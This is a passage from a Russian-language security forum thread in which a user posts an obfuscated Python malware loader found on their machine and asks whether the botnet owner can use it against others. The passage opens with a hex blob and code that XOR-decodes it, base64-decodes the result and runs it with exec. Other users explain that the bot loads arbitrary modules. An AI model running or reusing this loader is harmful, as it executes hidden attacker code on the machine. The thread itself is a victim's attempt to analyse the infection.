1092d1c3d2a2917045b3c5a122d331108200c15052752130e2d30061027081828412a1c032f5300122d3802312f0b0b2f3703050e2c4f0f2b572118043a36163d2e06133d3619142801251e0137290509222712203c03023d2a2640063e531f3f32341e222f3244071d31590e323c003b213100053a2a1c240028132c2d20550805531532382d58303b061e2833320f0525220005000d1a39121d030f2f0b063e235213082d201911270c102a310f473e5b02182e4743550f2f31462f330c5e0904381d2a56251e051f3e003d135a043c0f061e313035143d43311032582405110d03063d2a3616045b2413172d3054335a350207190019213e021c1057390e062535493d5b3c5a2e471a0c0805351405273606213e02021109071d0331031e06045b102f47380e085b2d00001e31103032204510233d1f3d3107033e04535a2e471e0f203c130b0742210f33584f00280907062b35221b053e061f174734020a3026013d27351d0b3d43072b32520705412a402b2e2c0114221e110a5a2114073721590b2e471b283c390e04403209030553012f2d200c202b0c4506375e01302d201e2a565a1e3d3a32033d3127531346422f2220031d05271f05232c240c16333e5e241b2517042e531012334b0f3230351a3428135029033712280952112e351717063e5e0d14324b0c312f31193c42561f30222006283c265e04355d0a032f53012f2d200c3c5a131634271f1f333d24192822521c05403641052e3c10214706003c11031d3d282906205b463e3b2729113d2a2216033120192626160b0f2035052b195f1f20323b19111e52073721320a2d0419533c2d3f09312f5f4b3e42315932584703282c3d1b3d2a291e2d3a02022c3243140905131a3c420f1f095927062b33391c062551023e3f531d2f2d200b272b0303062829033307380f11091f5a032a2e1c033138192c2d300f21111f1b0643350f0b3d27053d572911062551402c21281c15462002312f21423d230c5e0907200f11205a0305435d093d312c5b2c2d3c5420202d1e07265e58090701062b33391c062551023e3f531a15360a0f3230351a34281407083d4f1e16331304040b07460607241c141c470f0f3f560507090f1e085938452a56390003352100013a015d15470a083130264b3e280f590907301f162252583d2a0c402c2120061546331721121f0806373105092e421b3e2708502b412a033d3e3c1d261c11142801261505273e0e08074f453b2c251b3d253207280724192c2224133b3b0441291a261e201d19123b233d5c3e403207032e061c14194b5431300f423423040729033712162c215d28150b172e2a281e14472055092f31083c420f05333d274c283c0358041f221a032f535a2c2d1a5420202d1e0743261a20100e02173252073d25221b370009193c0f051208200b1405373101302e421b3935040f2e3126003d00281e14472055092f31083c420f05333d27431033520303251c1c045853052c22340f3b3f17080642531c082d4f1d282c260705255d1b033e120615444b0b313f21192f21080e23293419102c2504281f55063d213c192c2d3c020a2f311a3e34560b323b19123b27291c05403641052e3c102e473c12312f31083427315d0e223c1d2b57390e03353244032a02132c2d3c13272b044a06275e020e3d0e19111e5f062b3107482b5b5b1c2c3d241731302a592e090c5e0e32341e2b3c39043f402a063d2e3f532c2d1a540805211800365e5930321e45392c2104044125032d13125b1532200c0f2f32592e0910073a294f44112339000335315b2d1001213f3633030a3f3e1500282502333224192a56251e3d3531460421201a141b230b215931053e3721590b3d431b3e0d5f062c26101a0331200c15473c1d0a30254234275e132604341d16230c1d041f3218052128021232150b33595e1f05271f05325b4e053d56251e3d3531493e03335a2c32240e095a351e2f38311e302d3045283252020540361c2c3d1e0717220a08335b254300365e030858434528335e58040b0c1a0331200c15473c1d0a3025422837291f302d23053d572911062551402c2a0e131222460321111f1007430b13260720412833255903352219052e3f192f46241d335b2918071d0b1e0e2c46053d5725593e1c2609055b240615463f113e2f5e053e2753063d593840111d5e040235321a033138022f180a08272f2943071c5e1333593c05112c390c2b352a093d3e2c5a17224b1131051f1a3e432a5025291d42115707122b1f324406313b053d241d03222b251f06432e0e083d4f1e163313042e3508052e2e5b1c2c3d24173130291405373101302e193e3b272a0f2e3a2609063e5f5a3d324312312031013e2614070807300128370f0c2c230b172e2a2b0d17222b03093f5e1900271f053d1312002b335a042d435417063e5e0d14324b0c312f31193c42561f30222006283c265e043a2e0005073b053c46201d0e3f0b073e09251b0b3d0e063b235a1e3d3a32033d3a2b043d474312312031013e2614070807300128370f0c2c26100a032e531d2e46200b0805311a3e330f1a0858301e2833390e05255d1b033e120615440610095a35430637310b2058431d10333e063f245400285b121c2f222008312e5e0606423558082d200f3e0a291e04310c04055b385b14322406215a521a0627320732391d42112c2118051c351f2d5b1e1a14320a08312b250606423558082d2312381d1f1c05403641052e3c083c47470c093f321c3c230c22232937123b2c2911062551402c2a0e5b1532200c0f2f32150527561e08593c45111d081828400804042e5313123d3c020805310800271f593a3c240c16333e232e3125172e2e301c151c3014093026150527530e083d4f1e16331304300b00000531281c151b201e215957442719260e232937121333320f051f5d402e212406123d2413335a0b0607375e100e291e05103c2a18281f32443e5b3c1d12321e1209045e423e280f593a3d20412b563d1f033508060505535a2c2d1a5420112d382d372901080312453b23071d04413618052e1d0d3f1c0614093025102e425201083d231b2a3718063f35501e285b061e15324b1d0f202914071d31130e3d0e4522313100053a2a1c285b241c141b20140906311e2719260e23293405280d291d05413517063e5b1d1446385408595e0b3e282958082227432b56521d03350805033e3f213f3633032220250b052752592129120610562d032e3555063d213c192c261114245a56043e38311a303c4f1f1056390437253244032120022f4620020f2f314600330f1d0858244410233d123f402a063d2e3c103a36115c2111130606423558082d201738565e000525311e3f3a1904261c1117211210042e09131d0858244410233d0a2d405118053e3f042e26010a3b0104022b42561f30222006283252020540361c373e235838322008325a5e193e230f1d0858244410233d0e3e405d1b3d3a015d14224b0f0f3f1f1e3c4335060907201d28205b1f241b25172e2a281a2c1c3010095a35430637310b20580e032b33390e05255d1b3d3a0e0e2621420a0f2f0f0b3e272102201006021109071d0331031e052e53022c363010095a35430637320e33323b12162303113d25221b2d10015d14224b0f0f3f1f1e3c4335060907201d28205a110325511605043c592e474312312031013e230f10095830132b56521d3d1f081e2b2e5b1c2c3d2417313e5e1806423505262d4703282c3d1b3d24171e05042c1e2c261600203908152d33260e082d4f1d28233d033f4055063d213c192c2d3c06093f5e1900271f053d1312002b335a042d435514373e5b1c2c3d2417313c130106422102303d24131033520303251c1c04581e1e14472055092f31102e425201083d231b2a325a0a2d41361f04043c022c3616003b3f56043e38311a303c4f45132c21043e25353b2e2a280613323c080820361536280f03303234451333521d2e35220a2e2e3f5c2c2d1a0e3130254205275e1c32592419172c3a513d2a0c1a3d31285a17224b11335b351e0138361b0e223c1d2b563d013e252a022b04301c1518430c0f2e5e1e01372a06213b19123b2307052e351c1c0500020613323c08082035020642520f0e2d2041162700003726254624002b0d3f3d201d0e3c171e013729050922240510565e0e03353244032a19533c440a11332f52102e09131030323802391d0f0c2d050b172e2a280613323c080820361536280f03303234451333521d2e35220a2e2e3f5c1532341e081f08152d33251030323013163c211b3721001f0321381d391c4a1221302a1e070a5e063a39200f380918512d2a291d3d2e5253123d380c325a311b3d27291b2013231a2b33391c062551023e3f530514463c54272f211906270b1c0b58301311232d580631131e06045b102f47380e085b2d00001e31103032204510233d1f3d3107033e04535a2e471e0f203c131906415e1030323044283c25582c3a2e1c043f535b15180517323f35060527521b333c4f05112713033e2a361837311904123d380c325a321c2b1d315d335820021623071e051e5d403d31025a1026192f222b2542071e0c5f0e2d1a0128375e120535321c042a021a141b230b085a1f1e3e282619213b19123b233d5c3e403207032a282c13323c08082035020642530e33323b1228301b580625551c2b0724192c222413202c040b2934261929071a183b22520e051f22043d3f530c2621420a33595e063d270b1c325b4e1b3d095a000625501f2c380557").decode("hex")
nlkyoie = ("67696a6a767572646b6867726470").decode("hex");ahuqradfermy = "";uzvjjthhg=0
for fipzhkvresaeg in range(12856):
    ahuqradfermy = ahuqradfermy + chr(ord(jdetiggavomna[fipzhkvresaeg]) ^ ord(nlkyoie[uzvjjthhg]))
    uzvjjthhg = uzvjjthhg + 1
    if uzvjjthhg >= 14:
        uzvjjthhg = 0
hwblqemivvbfqf = b64decode(ahuqradfermy)
exec(hwblqemivvbfqf)

    Т.е. приведенный пример в первом посте это base64 decode скрипта в спойлере

    UPD
    Может поможет в моем вопросе - системный ДНС установлен абсолютно левый, не провайдер и даже не гугл, судя по адресу расположен в Украине
     
    #3 traceme, 17 Sep 2015
    Last edited: 17 Sep 2015
  4. Kaimi

    Kaimi Well-Known Member

    Joined:
    23 Aug 2007
    Messages:
    1,732
    Likes Received:
    811
    Reputations:
    231
    Именно хозяину ботнета или может ли хозяин ботнета?
     
    _________________________
    #4 Kaimi, 17 Sep 2015
    traceme likes this.
  5. traceme

    traceme Member

    Joined:
    11 Jun 2015
    Messages:
    34
    Likes Received:
    11
    Reputations:
    1
    Второй вариант. Может ли хозяин ботнета атаковать чужие фтп через компьютеры где запустили этот скрипт?
     
    #5 traceme, 17 Sep 2015
  6. Kaimi

    Kaimi Well-Known Member

    Joined:
    23 Aug 2007
    Messages:
    1,732
    Likes Received:
    811
    Reputations:
    231
    Бот умеет подгружать произвольные модули, владелец может что угодно делать
     
    _________________________
    #6 Kaimi, 17 Sep 2015
    traceme likes this.
  7. traceme

    traceme Member

    Joined:
    11 Jun 2015
    Messages:
    34
    Likes Received:
    11
    Reputations:
    1
    Вы мне очень сильно помогли, спасибо Вам огромное!
     
    #7 traceme, 18 Sep 2015
(You must log in or sign up to post here.)
Loading...
Similar Threads - Подскажите делает python
  1. navai

    Подскажите шелл на PHP8, Linux 4

    navai, 16 Mar 2023, in forum: Песочница
    Replies:
    3
    Views:
    3,183
    navai
    20 Mar 2023
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.